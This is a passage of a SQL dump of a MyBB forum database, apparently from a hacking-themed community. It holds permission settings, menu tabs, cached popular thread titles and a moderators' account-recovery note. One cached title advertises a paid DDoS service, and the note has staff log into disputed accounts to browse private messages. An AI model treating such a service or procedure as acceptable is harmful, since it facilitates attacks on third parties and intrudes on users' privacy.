editattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"656\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"772\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:39;a:8:{i:2;a:18:{s:3:\"pid\";s:3:\"124\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"125\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"126\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"192\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"226\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"297\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"653\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"769\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:40;a:3:{i:9;a:18:{s:3:\"pid\";s:3:\"122\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"121\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"123\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}}'); INSERT INTO mybb_datacache VALUES('modnotes', 'a:1:{s:10:\"modmessage\";s:0:\"\";}'); INSERT INTO mybb_datacache VALUES('tabmenu', 'a:8:{i:6;a:3:{s:5:\"tabid\";s:1:\"6\";s:7:\"tabname\";s:8:\"General \";s:7:\"tabcats\";s:3:\"1,6\";}i:5;a:3:{s:5:\"tabid\";s:1:\"5\";s:7:\"tabname\";s:7:\"Hacking\";s:7:\"tabcats\";s:2:\"10\";}i:12;a:3:{s:5:\"tabid\";s:2:\"12\";s:7:\"tabname\";s:7:\" Coding\";s:7:\"tabcats\";s:2:\"51\";}i:13;a:3:{s:5:\"tabid\";s:2:\"13\";s:7:\"tabname\";s:9:\"Computing\";s:7:\"tabcats\";s:2:\"22\";}i:24;a:3:{s:5:\"tabid\";s:2:\"24\";s:7:\"tabname\";s:6:\"Groups\";s:7:\"tabcats\";s:2:\"57\";}i:23;a:3:{s:5:\"tabid\";s:2:\"23\";s:7:\"tabname\";s:8:\"Upgraded\";s:7:\"tabcats\";s:5:\"26,31\";}i:22;a:3:{s:5:\"tabid\";s:2:\"22\";s:7:\"tabname\";s:6:\"Gaming\";s:7:\"tabcats\";s:2:\"70\";}i:25;a:3:{s:5:\"tabid\";s:2:\"25\";s:7:\"tabname\";s:8:\"Graphics\";s:7:\"tabcats\";s:2:\"32\";}}'); INSERT INTO mybb_datacache VALUES('most_replied_threads', 'a:15:{i:0;a:4:{s:3:\"tid\";s:3:\"190\";s:7:\"subject\";s:19:\"Copy and paste game\";s:7:\"replies\";s:3:\"103\";s:3:\"fid\";s:2:\"56\";}i:1;a:4:{s:3:\"tid\";s:3:\"238\";s:7:\"subject\";s:22:\"Ban the user above you\";s:7:\"replies\";s:2:\"89\";s:3:\"fid\";s:2:\"56\";}i:2;a:4:{s:3:\"tid\";s:3:\"197\";s:7:\"subject\";s:10:\"/me Thread\";s:7:\"replies\";s:2:\"70\";s:3:\"fid\";s:2:\"56\";}i:3;a:4:{s:3:\"tid\";s:3:\"431\";s:7:\"subject\";s:40:\"[Free] R?????zo?\'s GFX Service\";s:7:\"replies\";s:2:\"69\";s:3:\"fid\";s:2:\"61\";}i:4;a:4:{s:3:\"tid\";s:3:\"253\";s:7:\"subject\";s:12:\"Count to 200\";s:7:\"replies\";s:2:\"63\";s:3:\"fid\";s:2:\"56\";}i:5;a:4:{s:3:\"tid\";s:3:\"212\";s:7:\"subject\";s:58:\"Official New Groups Questions, Inquires, Policies and More\";s:7:\"replies\";s:2:\"60\";s:3:\"fid\";s:2:\"58\";}i:6;a:4:{s:3:\"tid\";s:3:\"747\";s:7:\"subject\";s:27:\"L33THACKING WAS NEVER SOLD!\";s:7:\"replies\";s:2:\"57\";s:3:\"fid\";s:1:\"3\";}i:7;a:4:{s:3:\"tid\";s:3:\"861\";s:7:\"subject\";s:23:\"L33T Hacking Milestones\";s:7:\"replies\";s:2:\"55\";s:3:\"fid\";s:1:\"7\";}i:8;a:4:{s:3:\"tid\";s:4:\"1091\";s:7:\"subject\";s:25:\"Rate the avatar above you\";s:7:\"replies\";s:2:\"49\";s:3:\"fid\";s:2:\"56\";}i:9;a:4:{s:3:\"tid\";s:3:\"249\";s:7:\"subject\";s:27:\"Last person to reply, wins!\";s:7:\"replies\";s:2:\"41\";s:3:\"fid\";s:2:\"56\";}i:10;a:4:{s:3:\"tid\";s:3:\"487\";s:7:\"subject\";s:14:\"Corrupt a wish\";s:7:\"replies\";s:2:\"40\";s:3:\"fid\";s:2:\"56\";}i:11;a:4:{s:3:\"tid\";s:3:\"829\";s:7:\"subject\";s:22:\"Adventure Quest Worlds\";s:7:\"replies\";s:2:\"37\";s:3:\"fid\";s:2:\"74\";}i:12;a:4:{s:3:\"tid\";s:3:\"345\";s:7:\"subject\";s:22:\"Need userbar! [Gamers]\";s:7:\"replies\";s:2:\"31\";s:3:\"fid\";s:2:\"63\";}i:13;a:4:{s:3:\"tid\";s:3:\"662\";s:7:\"subject\";s:25:\"Is this how you treat me?\";s:7:\"replies\";s:2:\"30\";s:3:\"fid\";s:1:\"7\";}i:14;a:4:{s:3:\"tid\";s:2:\"43\";s:7:\"subject\";s:20:\"How did you find us?\";s:7:\"replies\";s:2:\"29\";s:3:\"fid\";s:1:\"7\";}}'); INSERT INTO mybb_datacache VALUES('most_viewed_threads', 'a:15:{i:0;a:4:{s:3:\"tid\";s:4:\"1118\";s:7:\"subject\";s:48:\"? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?\";s:5:\"views\";s:3:\"641\";s:3:\"fid\";s:1:\"9\";}i:1;a:4:{s:3:\"tid\";s:3:\"190\";s:7:\"subject\";s:19:\"Copy and paste game\";s:5:\"views\";s:3:\"451\";s:3:\"fid\";s:2:\"56\";}i:2;a:4:{s:3:\"tid\";s:3:\"212\";s:7:\"subject\";s:58:\"Official New Groups Questions, Inquires, Policies and More\";s:5:\"views\";s:3:\"408\";s:3:\"fid\";s:2:\"58\";}i:3;a:4:{s:3:\"tid\";s:3:\"747\";s:7:\"subject\";s:27:\"L33THACKING WAS NEVER SOLD!\";s:5:\"views\";s:3:\"408\";s:3:\"fid\";s:1:\"3\";}i:4;a:4:{s:3:\"tid\";s:3:\"431\";s:7:\"subject\";s:40:\"[Free] R?????zo?\'s GFX Service\";s:5:\"views\";s:3:\"357\";s:3:\"fid\";s:2:\"61\";}i:5;a:4:{s:3:\"tid\";s:3:\"238\";s:7:\"subject\";s:22:\"Ban the user above you\";s:5:\"views\";s:3:\"232\";s:3:\"fid\";s:2:\"56\";}i:6;a:4:{s:3:\"tid\";s:3:\"861\";s:7:\"subject\";s:23:\"L33T Hacking Milestones\";s:5:\"views\";s:3:\"204\";s:3:\"fid\";s:1:\"7\";}i:7;a:4:{s:3:\"tid\";s:3:\"345\";s:7:\"subject\";s:22:\"Need userbar! [Gamers]\";s:5:\"views\";s:3:\"192\";s:3:\"fid\";s:2:\"63\";}i:8;a:4:{s:3:\"tid\";s:3:\"197\";s:7:\"subject\";s:10:\"/me Thread\";s:5:\"views\";s:3:\"188\";s:3:\"fid\";s:2:\"56\";}i:9;a:4:{s:3:\"tid\";s:3:\"398\";s:7:\"subject\";s:56:\"[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]\";s:5:\"views\";s:3:\"172\";s:3:\"fid\";s:2:\"21\";}i:10;a:4:{s:3:\"tid\";s:4:\"1091\";s:7:\"subject\";s:25:\"Rate the avatar above you\";s:5:\"views\";s:3:\"166\";s:3:\"fid\";s:2:\"56\";}i:11;a:4:{s:3:\"tid\";s:3:\"253\";s:7:\"subject\";s:12:\"Count to 200\";s:5:\"views\";s:3:\"155\";s:3:\"fid\";s:2:\"56\";}i:12;a:4:{s:3:\"tid\";s:1:\"2\";s:7:\"subject\";s:11:\"Userbar tut\";s:5:\"views\";s:3:\"145\";s:3:\"fid\";s:2:\"34\";}i:13;a:4:{s:3:\"tid\";s:3:\"439\";s:7:\"subject\";s:20:\"Unique - Recruitment\";s:5:\"views\";s:3:\"145\";s:3:\"fid\";s:2:\"58\";}i:14;a:4:{s:3:\"tid\";s:3:\"662\";s:7:\"subject\";s:25:\"Is this how you treat me?\";s:5:\"views\";s:3:\"139\";s:3:\"fid\";s:1:\"7\";}}'); INSERT INTO mybb_datacache VALUES('mailqueue', 'a:3:{s:10:\"queue_size\";s:1:\"0\";s:6:\"locked\";i:0;s:8:\"last_run\";i:1352662166;}'); INSERT INTO mybb_datacache VALUES('adminnotes', 'a:1:{s:12:\"adminmessage\";s:1108:\"***Normal Members***\r\n\r\n1. Ask for their IP and check via (http://l33thacking.com/modcp.php?action=ipsearch) if a lot of posts come in the results. If a lot of results show up then it means that that IP has been used a lot also search users to see if it belongs to the stolen/hacked account.\r\n\r\n2. Ask what latest PM they remember they replied to. Go to the hacked/stolen account and use the login to the account and browse their inbox to check if they are legit or not because anyone can get the IP.\r\n\r\n***Normal Members but with donation award(s)***\r\n\r\n1. Ask for IP or IP and PM.\r\n2. Ask them to give a screenshot of the donation transaction they made to LH then match date with award.\r\n\r\n***Upgraded***\r\n\r\n1. Ask for IP\r\n2. Proof of Purchase of upgrade. Picture or video, match date with the award given data.\r\n3. Tell them to list any forum that can be viewed after upgrading under the VIP members tab.\r\n\r\n*#$*#$*#$*NOTE*#$*#$*#$*\r\n\r\nIf you believe that the account really belongs to them then change their email to the new email they provide you. Then after they change the password, merge the account.\";}'); INSERT INTO mybb_datacache VALUES('extensions', 'a:1:{s:6:\"active\";s:0:\"\";}'); DROP TABLE IF EXISTS mybb_delayedmoderation; CREATE TABLE mybb_delayedmoderation ( did int(10) unsigned NOT NULL auto_increment, type varchar(30) NOT NULL, delaydateline bigint(30) NOT NULL, uid int(10) unsigned NOT NULL, fid smallint(5) unsigned NOT NULL, tids text NOT NULL, dateline bigint(30) NOT NULL, inputs text NOT NULL, PRIMARY KEY (did) ); DROP TABLE IF EXISTS mybb_events; CREATE TABLE mybb_events ( eid int(10) unsigned NOT NULL auto_increment, cid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, name varchar(120) NOT NULL, description text NOT NULL, visible int(1) NOT NULL, private int(1) NOT NULL, dateline int(10) unsigned NOT NULL, starttime int(10) unsigned NOT NULL, endtime int(10) unsigned NOT NULL, timezone varchar(4) NOT NULL, ignoretimezone int(1) NOT NULL, usingtime int(1) NOT NULL, repeats text NOT NULL, PRIMARY KEY (eid), KEY daterange (starttime,endtime), KEY private (private) ); DROP TABLE IF EXISTS mybb_forumpermissions; CREATE TABLE mybb_forumpermissions ( pid int(10) unsigned NOT NULL auto_increment, fid int(10) unsigned NOT NULL, gid int(10) unsigned NOT NULL, canview int(1) NOT NULL, canviewthreads int(1) NOT NULL, canonlyviewownthreads int(1) NOT NULL, candlattachments int(1) NOT NULL, canpostthreads int(1) NOT NULL, canpostreplys int(1) NOT NULL, canpostattachments int(1) NOT NULL, canratethreads int(1) NOT NULL, caneditposts int(1) NOT NULL, candeleteposts int(1) NOT NULL, candeletethreads int(1) NOT NULL, caneditattachments int(1) NOT NULL, canpostpolls int(1) NOT NULL, canvotepolls int(1) NOT NULL, cansearch int(1) NOT NULL, PRIMARY KEY (pid) ); INSERT INTO mybb_forumpermissions VALUES('596', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('61', '2', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('597', '5', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('62', '2', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('601', '5', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('598', '5', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('65', '2', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('63', '2', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('602', '5', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('600', '5', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('599', '5', '6', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('64', '2', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('66', '2', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('133', '12', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('135', '15', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('754', '17', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('753', '17', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('537', '28', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('829', '16', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('630', '19', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('628', '19', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('627', '19', '6', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('626', '19', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('625', '19', '4', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('624', '19', '3', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('629', '19', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('623', '19', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('622', '19', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('69', '9', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('132', '12', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('134', '15', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('828', '16', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('101', '28', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('106', '29', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('102', '28', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('107', '29', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('108', '29', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('103', '28', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('109', '29', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('104', '28', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('110', '29', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('105', '28', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('122', '40', '9', '1', '1', '0', '1', '0', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('124', '39', '2', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('125', '39', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('126', '39', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('121', '40', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('123', '40', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('842', '30', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('843', '30', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('844', '30', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('845', '30', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('846', '30', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('436', '31', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_forumpermissions VALUES('437', '31', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO mybb_forumpermissions VALUES('438', '31', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('439', '31', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('440', '31', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO mybb_forumpermissions VALUES('824', '43', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', 